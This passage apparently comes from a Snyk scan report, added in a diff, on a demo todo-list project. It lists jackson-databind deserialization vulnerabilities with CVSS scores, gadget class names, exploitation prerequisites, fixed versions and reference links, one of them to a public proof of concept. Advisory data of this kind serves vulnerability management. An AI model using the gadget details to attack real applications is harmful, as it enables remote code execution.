"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following 